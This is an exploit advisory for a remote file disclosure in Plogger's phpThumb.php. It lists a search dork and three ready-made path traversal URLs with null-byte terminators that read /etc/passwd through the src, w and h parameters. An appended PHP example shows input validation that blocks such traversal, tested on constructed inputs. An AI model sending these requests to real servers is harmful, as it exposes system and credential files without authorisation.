Plogger remote file disclosure vulnerability

2010.08.16
Credit: Mr.tro0oqy
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker)
# email : t.4@windowslive.com

exp :

Line 117: if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: $_GET['w'] = $matches[1];
Line 42: $_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00

greetz : all muslems (ramadan kreem)
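An added example, not code from the advisory, Plogger or phpThumb: one way to validate the src, w and h request parameters before a value like the one on line 117 reaches fopen(). The function names, the image base directory, the extension allow-list and the 4096 limit are assumptions made for the illustration.

```php
<?php
// Added example: hypothetical helpers, not phpThumb or Plogger code.

// Resolve a user-supplied image path; return null unless it stays inside $baseDir.
function resolve_image_source(string $baseDir, string $src): ?string
{
    // Reject NUL bytes outright (the %00 in the advisory's requests decodes to one).
    if ($src === '' || strpos($src, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses ../ and symlinks, and returns false for a missing file.
    $real = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $src);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must still sit under the base directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Assumed allow-list of image types the gallery serves.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true) ? $real : null;
}

// Width and height are only ever positive integers; 4096 is an assumed upper bound.
function clean_dimension(string $value, int $max = 4096): ?int
{
    $opts = ['options' => ['min_range' => 1, 'max_range' => $max]];
    $n = filter_var($value, FILTER_VALIDATE_INT, $opts);
    return $n === false ? null : $n;
}

// Constructed sample tree so the script runs offline.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'plog_demo_' . getmypid();
mkdir($root . '/images', 0700, true);
file_put_contents($root . '/images/cat.jpg', 'fake image bytes');
file_put_contents($root . '/secret.txt', 'not an image');

// Constructed inputs: one legitimate name, then traversal attempts.
foreach (['cat.jpg', '../secret.txt', "../../../../etc/passwd\0"] as $src) {
    $ok = resolve_image_source($root . '/images', $src) !== null;
    printf("src=%-28s %s\n", addcslashes($src, "\0"), $ok ? 'allowed' : 'rejected');
}
foreach (['120', '../../etc/passwd', '0'] as $w) {
    printf("w=%-30s %s\n", $w, clean_dimension($w) === null ? 'rejected' : 'allowed');
}
```

The containment check runs on the canonical path returned by realpath(), so it holds regardless of how the ../ sequences are written in the request.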


Copyright 2024, cxsecurity.com

 
